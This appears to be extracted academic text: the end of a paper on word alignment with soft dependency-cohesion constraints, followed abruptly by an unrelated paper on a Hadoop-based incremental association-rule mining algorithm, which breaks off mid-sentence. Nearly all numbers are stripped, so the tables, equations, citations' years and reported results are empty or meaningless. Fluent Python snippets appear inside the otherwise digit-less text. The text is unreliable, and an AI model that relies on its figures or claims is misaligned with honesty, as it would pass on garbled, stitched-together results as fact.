algorithms on the fbis training set. for approximate em algorithm, we first train a hmm model (with iterations of ibm model and iterations of hmm model), then train these four sub-models with iterations of the approximate em algorithm. for gibbs sampling, we choose symmetric dirichlet priors identically with all hyper-parameters equals . to obtain a sparse dirichlet prior. then, we make the alignments produced by the hmm model as the initial points, and train these sub-models with iterations of the gibbs sampling. aers on the development set are listed in table . we can easily find: ) when employing the head-modifier cohesion constraint, the wd-hc model yields better aers than the wd model; ) train set source corpus # words fbis fbis newswire data ch: . m en: . m large ldc t , ldc e , ldc e , ldc t , ldc t , ldc l , ldc t , ldc t ch: . m en: . m table : the size and the source corpus of the two training sets. when employing the modifier-modifier cohesion constraint, the wd-mc model also yields better aers than the wd model; and ) when employing both head-modifier cohesion constraint and modifier-modifier cohesion constraint together, the wd-hc-mc model yields the best aers among the four sub-models. 
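the aer figures reported here are computed from the sure and possible links of the hand-aligned data. the following sketch implements the standard definition from och and ney; encoding links as sets of (source, target) pairs is our own convention.

```python
def aer(predicted, sure, possible):
    """alignment error rate (och and ney); lower is better.

    predicted : set of (src, tgt) links produced by the aligner
    sure      : set of sure gold links S
    possible  : set of possible gold links P (with S a subset of P)
    """
    if not predicted and not sure:
        return 0.0
    a_s = len(predicted & sure)
    a_p = len(predicted & possible)
    return 1.0 - (a_s + a_p) / (len(predicted) + len(sure))
```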
so both head-modifier cohesion constraint and modifier-modifier cohesion constraint are helpful for word alignment. table also shows that the approximate em algorithm yields better aers in the forward direction than reverse direction, while the gibbs sampling algorithm yields close aers in both directions. . comparison with state-of-the-art models to show the effectiveness of our model, we compare our model with some of the state-of-the- art models. all the systems are listed as follows: ) ibm : the fertility-based model (ibm model ) which is implemented in giza++ toolkit. the training scheme is iterations of ibm model , iterations of the hmm model and iterations of ibm model . ) ibm -l : a modification to the giza++ toolkit which extends ibm models with ℓ - norm (vaswani et al., ). the training scheme is the same as ibm . ) ibm -prior: a modification to the giza++ toolkit which extends the translation model of ibm models with dirichlet priors (riley and gildea, ). the training scheme is the same as ibm . ) agree-hmm: the hmm alignment model by jointly training the forward and reverse models (liang et al., ), which is implemented in the berkeleyaligner. the training scheme is iterations of jointly training ibm model and iterations of jointly training hmm model. ) tree-distance: the tree distance alignment model proposed in denero and klein ( ), which is implemented in the berkeleyaligner. the training scheme is iterations of jointly training ibm model and iterations of jointly training the tree distance model. ) hard-cohesion: the implemented “cohesion checking algorithm” (lin and cherry, ) which takes dependency cohesion as a hard constraint during beam search word alignment decoding. we use the model trained by the agree-hmm system to estimate alignment candidates. we also build two systems for our soft dependency cohesion model: ) soft-cohesion-em: the wd-hc-mc sub-model trained with the approximate em algorithm as described in sub-section . . ) soft-cohesion-gibbs: the wd-hc-mc sub-model trained with the gibbs sampling algorithm as described in sub-section . . we train all these systems on the fbis training set, and test them on the testing set. we also combine the forward and reverse alignments with the grow-diag-final-and (gdfa) heuristic (koehn et al., ). all aers are listed in table . we find our soft cohesion systems produce better aers than the hard-cohesion system as well as the other systems. table gives the head-modifier cohesion percentage (hcp) and the modifier- modifier cohesion percentage (mcp) of each system. we find hcps and mcps of our soft cohesion systems are much closer to the gold- standard alignments. to evaluate whether our model is adaptable for large-scale task, we retrained these systems using the large training set. aers on the testing set are listed in table . compared with table , we tree-distance system requires too much memory to run on our server when using the large data set, so we can’t get the result. forward reverse gdfa ibm . . . ibm -l . . . ibm -prior . . . agree-hmm . . . tree-distance . . . hard-cohesion . . . soft-cohesion-em . . . soft-cohesion-gibbs . . . table : aers on the testing set (trained on the fbis data set). em gibbs forward reverse forward reverse wd . . . . wd-hc . . . . wd-mc . . . . wd-hc-mc . . . . table : aers on the development set (trained on the fbis data set). find all the systems yield better performance when using more training data. 
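the hcp and mcp numbers reported for each system can be computed directly from a system's output and the source-side dependency trees. the sketch below assumes the usual span-overlap notion of crossings from the cited cohesion literature (fox; lin and cherry): a head-modifier pair crosses when the modifier subtree's target span overlaps the head word's own aligned span, and a modifier-modifier pair crosses when the two modifier subtrees' target spans overlap. the dict-based encodings of the tree and the alignment are our own conventions.

```python
def target_span(node, children, alignment):
    """smallest target-side interval covering all links in the subtree rooted at node."""
    spots, stack = [], [node]
    while stack:
        n = stack.pop()
        spots.extend(alignment.get(n, []))        # aligned target positions of word n
        stack.extend(children.get(n, []))
    return (min(spots), max(spots)) if spots else None

def crossing(span_a, span_b):
    """two spans cross when both exist and their intervals overlap."""
    return (span_a is not None and span_b is not None
            and not (span_a[1] < span_b[0] or span_b[1] < span_a[0]))

def cohesion_percentages(children, alignment):
    """hcp and mcp (in %) for one aligned sentence pair.

    children  : dict {head position: [modifier positions]} for the source dependency tree
    alignment : dict {source position: [aligned target positions]}
    """
    hm = hm_ok = mm = mm_ok = 0
    for h, mods in children.items():
        head_span = target_span(h, {}, alignment)          # span of the head word alone
        mod_spans = {m: target_span(m, children, alignment) for m in mods}
        for m in mods:                                     # head-modifier pairs
            hm += 1
            hm_ok += 0 if crossing(head_span, mod_spans[m]) else 1
        for i, m1 in enumerate(mods):                      # modifier-modifier pairs
            for m2 in mods[i + 1:]:
                mm += 1
                mm_ok += 0 if crossing(mod_spans[m1], mod_spans[m2]) else 1
    hcp = 100.0 * hm_ok / hm if hm else 100.0
    mcp = 100.0 * mm_ok / mm if mm else 100.0
    return hcp, mcp
```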
our soft cohesion systems still produce better aers than other systems, suggesting that our soft cohesion model is very effective for large-scale word alignment tasks. . machine translation quality comparison we then evaluate the effect of word alignment on machine translation quality using the phrase-based translation system moses (koehn et al., ). we take nist mt test data as the development set, nist mt test data as the testing set. we train a -gram language model with the xinhua portion of english gigaword corpus and the english side of the training set using the srilm toolkit (stolcke, ). we train machine translation models using gdfa alignments of each system. bleu scores on nist mt are listed in table , where bleu scores are calculated using lowercased and tokenized data (papineni et al., ). although the ibm -l , agree-hmm, tree-distance and hard-cohesion systems improve word alignment than ibm , they fail to outperform the ibm system on machine translation. the bleu score of our soft-cohesion-em system is better than the ibm system when using the fbis training set, but worse when using the large training set. our soft-cohesion-gibbs system produces the best bleu score when using both training sets. we also performed a statistical significance test using bootstrap resampling with samples (koehn, ; zhang et al., ). experimental results show the soft-cohesion-gibbs system is significantly better (p< . ) than the ibm system. the ibm -prior system slightly outperforms ibm , but it’s not significant. related work there have been many proposals of integrating syntactic knowledge into generative alignment models. wu ( ) proposed the inversion transduction grammar (itg) to model word alignment as synchronous parsing for a sentence pair. yamada and knight ( ) represented translation as a sequence of re-ordering operations over child nodes of a syntactic tree. gildea ( ) introduced a “loosely” tree-based alignment technique, which allows alignments to violate syntactic constraints by incurring a cost in probability. pauls et al. ( ) gave a new instance of the itg formalism, in which one side of the synchronous derivation is constrained by the syntactic tree. fox ( ) measured syntactic cohesion in gold standard alignments and showed syntactic cohesion is generally maintained between english and french. she also compared three variant syntactic representations (phrase tree, verb phrase flattening tree and dependency tree), and found the dependency tree produced the highest degree of cohesion. so cherry and lin ( ; a) used dependency cohesion as a hard constraint to restrict the alignment space, where all potential alignments violating cohesion constraint are ruled forward reverse hcp mcp hcp mcp ibm . . . . ibm -l . . . . ibm -prior . . . . agree-hmm . . . . tree-distance . . . . hard-cohesion . . . . soft-cohesion-em . . . . soft-cohesion-gibbs . . . . gold-standard . . . . table : hcps and mcps on the development set. fbis large ibm . . ibm -l . . ibm -prior . . agree-hmm . . tree-distance . n/a hard-cohesion . . soft-cohesion-em . . soft-cohesion-gibbs . * . * table : bleu scores, where * indicates significantly better than ibm (p< . ). forward reverse gdfa ibm . . . ibm -l . . . ibm -prior . . . agree-hmm . . . hard-cohesion . . . soft-cohesion-em . . . soft-cohesion-gibbs . . . table : aers on the testing set (trained on the large data set). out directly. although the alignment quality is improved, they ignored situations where a small set of correct alignments can violate cohesion. 
to address this limitation, cherry and lin ( b) proposed a soft constraint approach, which took dependency cohesion as a feature of a discriminative model, and verified that the soft constraint works better than the hard constraint. however, the training procedure is very time- consuming, and they trained the model with only hand-annotated sentence pairs. therefore, their method is not suitable for large-scale tasks. in this paper, we also use dependency cohesion as a soft constraint. but, unlike cherry and lin ( b), we integrate the soft dependency cohesion constraint into a generative model that is more suitable for large-scale word alignment tasks. conclusion and future work we described a generative model for word alignment that uses dependency cohesion as a soft constraint. we proposed an approximate em algorithm and an explicit gibbs sampling algorithm for parameter estimation in an unsupervised manner. experimental results performed on a large-scale data set show that our model improves word alignment quality as well as machine translation quality. our experimental results also indicate that the soft constraint approach is much better than the hard constraint approach. it is possible that our word alignment model can be improved further. first, we generated word alignments in both forward and reverse directions separately, but it might be helpful to use dependency trees of the two sides simultaneously. second, we only used the one-best automatically generated dependency trees in the model. however, errors are inevitable in those trees, so we will investigate how to use n-best dependency trees or dependency forests (hayashi et al., ) to see if they can improve our model. acknowledgments we would like to thank nianwen xue for insightful discussions on writing this article. we are grateful to anonymous reviewers for many helpful suggestions that helped improve the final version of this article. the research work has been funded by the hi-tech research and development program (" " program) of china under grant no. aa a , aa , and aa and also supported by the key project of knowledge innovation program of chinese academy of sciences under grant no.kgzd-ew- . this work is also supported in part by the dapra via contract hr - -c- entitled "linguistic resources for multilingual processing". references mohit bansal, chris quirk, and robert moore, . gappy phrasal alignment by agreement. in proc. of acl . peter f. brown, stephen a. della pietra, vincent j. della pietra and robert l. mercer, . the mathematics of statistical machine translation: parameter estimation. computational linguistics, ( ). pages - . c. cherry and d. lin, . a probability model to improve word alignment. in proc. of acl ' , pages - . c. cherry and d. lin, a. a comparison of syntactically motivated word alignment spaces. in proc. of eacl ' , pages - . c. cherry and d. lin, b. soft syntactic constraints for word alignment through discriminative training. in proc. of coling/acl ' , pages - . john denero and dan klein, . tailoring word alignments to syntactic machine translation. in proc. of acl ' , pages . c. dyer, j. clark, a. lavie and n.a. smith, . unsupervised word alignment with arbitrary features. in proc. of acl ' , pages - . heidi j. fox, . phrasal cohesion and statistical machine translation. in proc. of emnlp ' , pages - . michel galley, mark hopkins, kevin knight, daniel marcu, . what's in a translation rule? in proc. of naacl ' , pages - . j. gao and m. johnson, . 
a comparison of bayesian estimators for unsupervised hidden markov model pos taggers. in proc. of emnlp ' , pages - . daniel gildea, . loosely tree-based alignment for machine translation. in proc. of acl' , pages - . k. hayashi, t. watanabe, m. asahara and y. matsumoto, . third-order variational reranking on packed-shared dependency forests. in proc. of emnlp ' . m. johnson, t. griffiths and s. goldwater, . bayesian inference for pcfgs via markov chain monte carlo. in proc. of naacl ' , pages - . philipp koehn, . statistical significance tests for machine translation evaluation. in proc. of emnlp' . p. koehn, h. hoang, a. birch, c. callison-burch, m. federico, n. bertoldi, b. cowan, w. shen, c. moran and r. zens, . moses: open source toolkit for statistical machine translation. in proc. of acl ' , demonstration session, pages - . percy liang, ben taskar and dan klein, . alignment by agreement. in proc. of hlt-naacl , pages - . d. lin and c. cherry, . word alignment with cohesion constraint. in proc. of naacl ' , pages - . adam lopez and philip resnik, . improved hmm alignment models for languages with scarce resources. in acl workshop on building and using parallel texts ' , pages - . cos ķun mermer and murat saraçlar, . bayesian word alignment for statistical machine translation. in proc. of acl ' , pages - . r.c. moore, . a discriminative framework for bilingual word alignment. in proc. of emnlp ' , pages - . f.j. och, c. tillmann and h. ney, . improved alignment models for statistical machine translation. in proc. of emnlp/wvlc ' , pages - . franz josef och and hermann ney, . a systematic comparison of various statistical alignment models. computational linguistics, ( ). pages - . k. papineni, s. roukos, t. ward and w.j. zhu, . bleu: a method for automatic evaluation of machine translation. in proc. of acl ' , pages - . adam pauls, dan klein, david chiang and kevin knight, . unsupervised syntactic alignment with inversion transduction grammars. in proc. of naacl ' . slav petrov, leon barrett, romain thibaux and dan klein, . learning accurate, compact, and interpretable tree annotation. in proc. of acl . jason riesa and daniel marcu, . hierarchical search for word alignment. in proc. of acl ' , pages - . jason riesa, ann irvine and daniel marcu, . feature-rich language-independent syntax-based alignment for statistical machine translation. in proc. of emnlp ' . darcey riley and daniel gildea, . improving the ibm alignment models using variational bayes. in proc. of acl ' . m. saers, j. nivre and d. wu, . word alignment with stochastic bracketing linear inversion transduction grammar. in proc. of naacl ' , pages - . a. stolcke, . srilm-an extensible language modeling toolkit. in icslp ' . b. taskar, s. lacoste-julien and d. klein, . a discriminative matching approach to word alignment. in proc. of emnlp ' , pages - . ashish vaswani, liang huang, and david chiang, . smaller alignment models for better translations: unsupervised word alignment with the l norm. in proc. acl' , pages – . stephan vogel, hermann ney and christoph tillmann, . hmm-based word alignment in statistical translation. in proc. of coling- , pages - . d. wu, . stochastic inversion transduction grammars and bilingual parsing of parallel corpora. computational linguistics, ( ). pages - . zhiguo wang, chengqing zong, . phrase structure parsing with dependency structure, in proc. of coling , pages - . zhiguo wang, chengqing zong, . parse reranking based on higher-order lexical dependencies, in proc. of ijcnlp , pages - . 
kenji yamada and kevin knight, . a syntax-based statistical translation model. in proc. of acl ' , pages - . ying zhang, stephan vogel, and alex waibel. . interpreting bleu/nist scores: how much improvement do we need to have a better system? in proc. of lrec. shaojun zhao and daniel gildea, . a fast fertility hidden markov model for word alignment using mcmc. in proc. of emnlp ' , pages - . international journal of advanced network, monitoring and controls volume , no. , incremental association rule mining algorithm based on hadoop zhu ying school of computer science and engineering xi’an technological university xi’ an, , china e-mail: @qq.com wang jianguo school of computer science and engineering xi’an technological university xi’ an, , china e-mail: wjg_xit@ .com abstract—aiming at the problems of low efficiency, low cost of time and space, this paper proposes an incremental association rule mining algorithm based on hadoop load balancing. in combination with the tree structure, when the data in the database is constantly updated, it does not need to scan the original database to generate frequent item sets, and use the load balancing in the data distribution so that the master node distributes the data to the child nodes evenly. in the experiment of control variable method, the variables of minimum support and sample increment are processed respectively. the experimental results show that when the minimum support is unchanged and the transaction data set is increased, the incremental association rule mining algorithm based on hadoop load balancing takes less than . % of the apriori algorithm. the number of association rules mined by the algorithm is more than that of the apriori algorithm. and the memory usage of the hadoop-based incremental association rule mining algorithm is much smaller than the apriori algorithm; when the total amount of transaction data is constant and the minimum support is changed, the memory usage of the hadoop-based incremental association rule mining algorithm is smaller than the apriori algorithm. the hadoop-based incremental association rule mining algorithm has some improvements in memory usage and efficiency. keywords—hadoop; tree structure; load balancing; frequent item sets; association rules i. introduction in today's era of big data, data is an important asset of information society, while data processing and management are also facing great challenges, such as data large amount of information, difficult to handle, difficult to obtain value. data mining [ ] is a deep data intelligence analysis method. the method involves knowledge of many related fields such as machine learning, deep learning, artificial intelligence, and information retrieval. it is mainly used to extract potential information data from a massive data set that can contribute to the value of business decisions.association rule mining technology [ ] is a very important part of data mining technology. under the big data environment, it can find many valuable information from the huge and irregular data by discovering the relationship among the items in the data set. research on association rule algorithm in big datatechnology environment is a very important and challenging research topic. considering that the data in the database is constantly updated, the incremental association rule updating techniques have been proposed to effectively maintain the association rules of updated data. 
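as a concrete reference for the two measures that drive association rule mining, support and confidence (formalised later in the threshold-setting subsection), here is a minimal python sketch that computes both; the toy shopping transactions and the values printed are our own illustrative assumptions.

```python
def support(itemset, transactions):
    """fraction of transactions that contain every item of the itemset."""
    itemset = set(itemset)
    return sum(1 for t in transactions if itemset <= t) / len(transactions)

def confidence(lhs, rhs, transactions):
    """how often rhs occurs among the transactions that already contain lhs."""
    return support(set(lhs) | set(rhs), transactions) / support(lhs, transactions)

# toy shopping transactions (illustrative only)
T = [
    {"butter", "ham", "yogurt"},
    {"butter", "ham"},
    {"yogurt", "bread"},
    {"cheese", "bread", "ham"},
]
print(support({"butter", "ham"}, T))          # 0.5
print(confidence({"butter"}, {"ham"}, T))     # 1.0
```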
literatures[ - ] proposed incremental association rule update technology, it is a highly efficient maintenance of data updating association rules, the literature describes in detail the characteristics of the technology. in the literature [ ], the frequent item sets mining algorithm of association rules is proposed, which is an important component of association rule analysis, data statistics, causality and other mining tasks. the idea of parallel implementation of algorithm is proposed in the literature [ ]. data is distributed by the master node to each node to reduce the load pressure. in the literature [ ], the fup algorithm needs to scan the original database several times to solve the frequent item sets. of the data environment, the mining efficiency is low. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , in the literature [ - ] , the paper introduces the characteristics and structure of the b+ tree, also mentioned the one-dimensional data index structure in the database. when dealing with large amounts of data, processing efficiency can be compromised due to high server load.therefore, this paper presents proposes an incremental association rule mining algorithm based on hadoop load balancing. the implementation of this algorithm uses the map/ reduce programming model to parallelize the mining tasks, and uses load balancing to mine frequent item sets in the clusters to get the association rules. ii. fup algorithm (fast update parallel) table i. symbolic description symbol means db raw data set db new data set dbudb all data sets frequent item sets(k-order) candidate set(k-order) when calculating the frequent item sets, the fup algorithm [ ] makes use of the known support of the old frequent item sets, and then through the frequent analysis of the candidate item sets in db and db, many candidates can be filtered out in the process of determining frequent item sets. therefore, it is more efficient than re-running the apriori algorithm, especially if the old and new frequent sets are not much different. however, like the apriori algorithm, the fup algorithm must spend a lot of time processing a large set of candidate items and it is necessary to repeatedly scan the database db and db to pattern match the candidate sets. since the fup algorithm uses to generate , the generated candidate set of db is large, and many of them are infrequent, and some even are impossible to appear in db, which affects the efficiency of the algorithm. in addition, the fup algorithm needs to perform k+ layer scanning on the entire database dbudb. in general, the original database db is very large, so the k+ layer scanning for the db is not efficient. the shortcomings of the current incremental update association mining algorithm: ) when the database is updated, the generation of frequent item sets will repeatedly scan the processed data sets, so that the mining efficiency is not high; ) generating a large number of candidate sets; ) with the addition of the database, the minimum support threshold and the minimum confidence threshold do not change, which will affect the mining of strong association rules; iii. fup algorithm improvement due to the inefficiency of fup algorithm in dealing with big data mining, this paper proposes an improved algorithm of fup, incremental association rule mining algorithm based on hadoop load balancing. 
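before describing the improvement, the bookkeeping behind fup-style maintenance can be summarised in a short sketch. this is a simplified, single-item python illustration under our own data-structure assumptions: support counts from the previous run are kept, only the increment is scanned for previously frequent itemsets, and a rescan of the original database is needed only for items that newly become frequent within the increment.

```python
def fup_level_one(old_counts, db_size, increment, min_sup):
    """simplified, single-item illustration of fup-style maintenance.

    old_counts : dict {frozenset(item): support count in the original database DB},
                 kept from the previous mining run
    db_size    : number of transactions in DB
    increment  : list of new transactions (each a set of items), i.e. db
    min_sup    : relative minimum support threshold
    returns    : (still_frequent, needs_db_scan)
    """
    total = db_size + len(increment)

    def inc_count(itemset):
        return sum(1 for t in increment if itemset <= t)

    # previously frequent itemsets: only the increment has to be scanned,
    # because their counts in DB are already known
    still_frequent = {}
    for itemset, old in old_counts.items():
        new = old + inc_count(itemset)
        if new >= min_sup * total:
            still_frequent[itemset] = new

    # items frequent within the increment but not frequent before are the only
    # new candidates; their counts in DB still have to be obtained by a scan
    needs_db_scan = set()
    for item in {i for t in increment for i in t}:
        c = frozenset([item])
        if c not in old_counts and inc_count(c) >= min_sup * len(increment):
            needs_db_scan.add(c)

    return still_frequent, needs_db_scan
```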
combined with the hadoop distributed platform and the use of a tree structure to store information, it is only necessary to scan the db and dbone time, which can effectively improve the scanning efficiency. when the database is updated, the newton interpolation formula is used to estimate the support threshold to efficiently process the association rules. a. vertical data representation [ ] a traditional database can be represented by a two-dimensional matrix. each column of a two-dimensional matrix can be treated as a project, and each row can be treated as a transaction of the database. in the traditional apriori algorithm, horizontal data is used to represent a transaction. the typical method of implementing two-dimensional matrix is horizontal data. most data mining algorithms use database access to calculate their support. in relational databases, the size of the data in the transaction database is relatively large, and there is a problem with the size of the computer memory at present, and there will be bottlenecks. this will lead to a contradiction: due to the continuous increase of data in the database. the size of the data will be larger and larger, but the memory and hard disk international journal of advanced network, monitoring and controls volume , no. , of the computer are limited. therefore, when the data in the database reaches a certain scale, the computer memory and the hard disk will not be stored enough. therefore, a new type of data representation is generated—vertical data representation. vertical data means that each record in the database consists of a list of all the transaction records that it has appeared, as shown in tab. : table ii. horizontal database tid item citrus fruit, yogurt, butter, ham tropical fruit,yogurt, coffee whole milk,citrus fruit,newspapers tropical fruit, yogurt, cream cheese , whole milk coffee, butter, yogurt, sauces, ham butter, ham, cream cheese, sauces, newspapers table iii. vertical database item tid butter citrus fruit coffee cream cheese ham newspapers sauces tropical fruit whole milk yogurt , , , , , , , , , , , , , , b. tree structure stores data information the b+ tree [ ] is a tree data structure, which is an n-fork sort tree. it is a variant tree of b-trees required by the file system. it features: ) there are n keywords in the node of n sub-trees. each keyword does not save data, only used for indexing, and all data is stored in leaf nodes. ) all leaf nodes contain information about all keywords, and pointers to records containing these keywords, and the leaf nodes themselves are linked in order from the smallest to the largest. ) all non-terminal nodes can be thought of as index parts, which contain only the largest (or smallest) keyword in their sub-tree (root node). as shown in fig. , it is a b+ tree of m= (consisting of information in tab. ). butter sauces p p butter cream cheese p p sauces whole milk p p butter cream cheese coffee cream cheese ham newspapers sauces tropical fruit whole milk yogurt figure . order three of the b+ tree c. hadoop distributed platform in this era of increasing data size, the traditional frequent item set mining algorithm has been difficult to support the mining of its massive transaction database. even if it can be mined, it will lead to a particularly long mining time, or it may be due to the huge amount of data. causes the program to fail. 
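the vertical representation makes support counting an intersection of tid sets. the sketch below converts the horizontal transactions of table ii into the vertical form of table iii and counts support by intersecting tid lists; the tid numbering (1-6) is illustrative, since the original identifiers were lost in extraction.

```python
from collections import defaultdict

def to_vertical(transactions):
    """convert a horizontal transaction table into item -> set of tids (vertical format)."""
    vertical = defaultdict(set)
    for tid, items in transactions.items():
        for item in items:
            vertical[item].add(tid)
    return vertical

def support_count(itemset, vertical):
    """support of an itemset = size of the intersection of its items' tid sets."""
    tid_sets = [vertical[i] for i in itemset]
    return len(set.intersection(*tid_sets)) if tid_sets else 0

# usage mirroring tables ii and iii above (tids assumed to be 1..6)
transactions = {
    1: {"citrus fruit", "yogurt", "butter", "ham"},
    2: {"tropical fruit", "yogurt", "coffee"},
    3: {"whole milk", "citrus fruit", "newspapers"},
    4: {"tropical fruit", "yogurt", "cream cheese", "whole milk"},
    5: {"coffee", "butter", "yogurt", "sauces", "ham"},
    6: {"butter", "ham", "cream cheese", "sauces", "newspapers"},
}
v = to_vertical(transactions)
print(support_count({"butter", "ham"}, v))   # butter and ham co-occur in tids 1, 5, 6
```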
the solution to the problem of the traditional frequent item set mining algorithm is to add the hadoop distributed platform to the frequent item set mining algorithm, which not only makes the traditional frequent item set mining algorithm run more efficiently, but also reduces the storage pressure of the database. international journal of advanced network, monitoring and controls volume , no. , transaction database d data block data block data block find local frequent item sets find local frequent item sets find local frequent item sets form a global candidate set find global frequent item sets in the candidate set get frequent item sets map阶段 map阶段 reduce阶段 reduce阶段 figure . frequent item set generation step diagram d. hbpt-fup algorithm based on the original algorithm, there are some disadvantages of generating a large number of candidate sets and repeated retrieval processing of the original database. combined with the characteristics of b+ tree, the data information is stored. based on fup algorithm, the incremental association rule mining algorithm under hadoop platform is proposed: hbpt- fup algorithm(incremental association rule mining algorithm based on hadoop load balancing,improved algorithm of fup algorithm). ) basic ideas ① statistics in the database transaction items, get transaction items set. ② setup process load estimation, through the map process using load balancing grouping way to read the transaction items, distributed to different reduce nodes. the reduce process is based on how the b+ tree is created and stores transaction item information. the bottommost leaf node of b+ tree contains all the item sets. the frequent item sets are obtained by comparing the number of items with the minimum support, and other infrequent item sets remain in their leaf nodes to ensure that future data updating become frequent nodes. the local frequent item sets are obtained by the b+ tree created by the reduce nodes, and the local frequent item sets are merged into the global frequent item sets to get the association rules. compared with the previous incremental updating correlation mining algorithm, the algorithm has the characteristics of load balancing. when dealing with large amounts of data, due to a single server load is too high affect the processing speed, so need to use server clusters to deal with. the load factor is added to the estimation of the load, which can calculate the load of each frequent item more accurately. the algorithm takes advantage of the b+ balanced tree properties. the leaf nodes at the bottom of the tree contain all the keywords of the whole tree, and they are linked together like a doubly linked list. ) estimated load the load in the parallelization process is equal to the sum of the load on each node [ ]. supposed that the load corresponding to the data item is i l , the position in the frequent item set is ip , the load influence factor is i a (the frequency of the data item): ( ) ) equalization of data frequent items in frequent item sets are divided into q groups according to the balanced grouping strategy, which makes the data balance in the distribution process so as to improve the parallelization of the mining process. if q is less than the length of frequent itemsets, the q items of frequent itemsets are assigned to each group in turn. the group's load is initialized by the sum of the frequent item loads in each group. 
and then repeat the following two steps until all the frequent items are assigned: ① to assign unallocated frequent items to the group with the lowest load; ② the load in each group is added up. if q is greater than the length of frequent itemsets, the first x of the frequent itemsets is assigned to the x group, which initializes the group load according to the load of the frequent items it contains, and then repeats the above two steps until all frequent items are assigned. international journal of advanced network, monitoring and controls volume , no. , ) threshold setting the minimum support threshold will change with the user's needs and the database update. when the threshold is set too low, the more rules are mined, but the rule is less useful. conversely, when the threshold is set too high, there are very few rules for mining, which will lose some useful rules. therefore, it is very important to set the appropriate threshold when dealing with incremental databases. definition : the support degree of item set is one of the most important metrics in association rule mining. it represents the probability that the item set will appear in the total item set. the formula is: ( ) where is the total transaction sets.num() represents the number of occurrences of a particular item set in a transaction set. definition : confidence indicates the probability that y is derived by the association rule in the event that the prerequisite x occurs. that is, in the item set containing x, there is a possibility of y. the formula is: ( ) the newton interpolation formula [ ] that can be used to derive the support threshold from the above formula is: ( ) where c is the confidence level, n is the number of rules, and m is the total number of attributes in the transaction set. when the association rule is first mined, the setting of the minimum support threshold is a trial and error process. when the transaction database is updated, it is possible that the previously set threshold is no longer applicable, so an adjustment threshold is required. in order to improve the accuracy of the estimation, the order of the newton interpolation polynomial can be improved as the number of executions of the algorithm increases. because the algorithm generates a parameter pair each time it runs. if this node is farther from the nearest two nearest interpolation nodes in the interpolation formula, you can add this node as a new interpolation node and adjust the interpolation formula. the accuracy of the adjustment of the adjusted interpolation formula at point is greatly improved. newton interpolation formula automatically determines the specific implementation process of support threshold, as follows: statistics are performed on some data in the experimental transaction data set (shopping data record), and the support degree and confidence corresponding to the rule are calculated, as shown in tab. (support, confidence in parentheses): table iv. rule support and confidence calculation results ham bread coffee butter ( . , . ) ( . , . ) ( . , . ) yogurt ( . , . ) ( . , . ) ( . , . ) cheese ( . , . ) ( . , . ) ( . , . ) a) for the data in tab. , set the reliability threshold to . , the support threshold to . , and run frequent pattern mining. the association rules available according to tab. are: butter->ham,yogurt->ham,yogurt->bread, cheese->ham,cheese->bread, cheese->coffee. b) set the reliability threshold to . and the support threshold to . . run frequent pattern mining. the association rules available according to tab. 
are: butter->ham, yogurt->bread, cheese->ham. c) set the reliability threshold to . and the support threshold to . . run frequent pattern mining. the association rules available according to tab. are: yogurt->bread. the newton interpolation formula for the known support threshold is . then can get the rd cd international journal of advanced network, monitoring and controls volume , no. , following three expressions: so you can get three interpolation nodes as:( . , . ),( . , . ),( . , . ). according to these three interpolation nodes, the difference quotient is shown in tab. : table v. difference quotient table number of rules ( ) first order difference quotient second order difference quotient . . . . - . . . - . . from tab. , a second-order newton interpolation polynomial can be written: ( ) at this time, the support threshold can be estimated according to the newton interpolation formula and the number of association rules expected by the user. a) determining the association rules that the user desires to mine (when the database update is about to be performed next time, the number of expected association rules is set to the average value of the total number of association rules of the previous mining); b) calculate the value of x according to the formula ; c) substituting the value of x into to calculate the estimated value of support sup. assuming that the user expects to mine three association rules, the calculated x value is: ( ) then the x value is substituted into to get the support: . sup can be chosen to be a value close to . . for example, take sup= . as the support threshold to perform the mining algorithm. e. algorithm implementation ) brief description of the algorithm steps using the tree structure to store information, a hadoop-based incremental association rule mining algorithm hbpt-fup is proposed. the algorithm is described as follows: step : traversing the transaction database, processing according to the vertical data representation to get the item set. in the setup phase: initialize the number of packets q, distribute the transaction items of the primary node to the q child nodes. a vertical data set is created in each node, and the vertical data set is traversed to obtain an item set inserted into the b+ tree. step : in each child node, all the frequent item sets of the group are obtained according to the generated b+ tree. step : when the transaction database updates the record, follow the first step to balance all incremental load to each node. the main focus is on the update algorithm of the b+ tree. add a keyword to the leaf node at the bottom of the b+ tree. if the number of keywords contained in the node does not exceed m, the insertion is successful. otherwise, the node needs to be split. the number of keywords included in the two new nodes after splitting should not be less than (m/ + ). if the parent node of the node has enough space (m/ ~ m- ), the parent node should contain the smallest keyword in the right node. otherwise, the parent node is international journal of advanced network, monitoring and controls volume , no. , split and a new keyword is added to the parent of the parent node, followed by a higher order until the new root node is generated ( ~ m- ). step : association rules generated after database update. ) algorithm flowchart begin scan the transaction database to get the transaction item set distribute to different reduce nodes according to map. 
constructing an inverted index tree statistics get the global candidate set and its frequency is the frequency greater than the minimum support? output frequent item sets combine different frequent items to calculate their confidence is it greater than the minimum confidence? output association rule whether the database is updated? end yes no yes delete yes no no figure . hbpt-fup algorithm step diagram iv. experimentresults and analysis in this experiment, the file retail (association rule study classic data set) downloaded from the uci database was used as the experimental transaction data set, and the hbpt-fup algorithm was compared with the apriori algorithm. use java language to simulate on win , dual-core . ghz cpu, gb memory pc. ) analysis of the time complexity of the algorithm when the data is updated, ○ only scans and updates part of the data in the database;○ scans the tree structure once and inserts the new item set. the analysis shows that when the minimum support is constant, the execution time of the algorithm is related to the amount of data updated each time. a small number of experimental samples are extracted from the dataset, and the minimum support degree of the apriori algorithm is controlled (min_sup= . ), and the amount of updated data is sequentially increased. the experimental time of the apriori algorithm and the hbpt-fup algorithm on a pc is recorded figure shows: figure . apriori and hbpt-fup algorithms time comparison as shown in figure , when the minimum support is constant, the execution time of the apriori algorithm grows faster than the hbpt-fup algorithm when the data set increases. when the data set is the same, the apriori algorithm takes longer than the hbpt- fup. ) comparison of the number of association rules mined. when the database is updated, the minimum support threshold of the apriori algorithm does not change ( . ), and the use of the newton interpolation polynomial in the hbpt-fup algorithm predicts the next minimum support threshold, which in turn makes the mined rules more efficient. in experiment , the number of association rules mined each time is counted separately. the number comparison is shown in figure : e xe cu ti o n t im e / s number of transaction items apriori hbpt-fup international journal of advanced network, monitoring and controls volume , no. , figure . comparison of the number of association rules as shown in figure , when the amount of update data increases, the minimum support remains unchanged, and the number of association rules mined by the apriori algorithm is less than that extracted by the hbpt-fup algorithm. after adjusting the minimum support, the hbpt-fup algorithm mines some rules that are easily missed, which increases the validity of the rules. ) analyze the spatial complexity of the algorithm ○ in the b+ tree, only the item set and its frequency are stored, so the size of 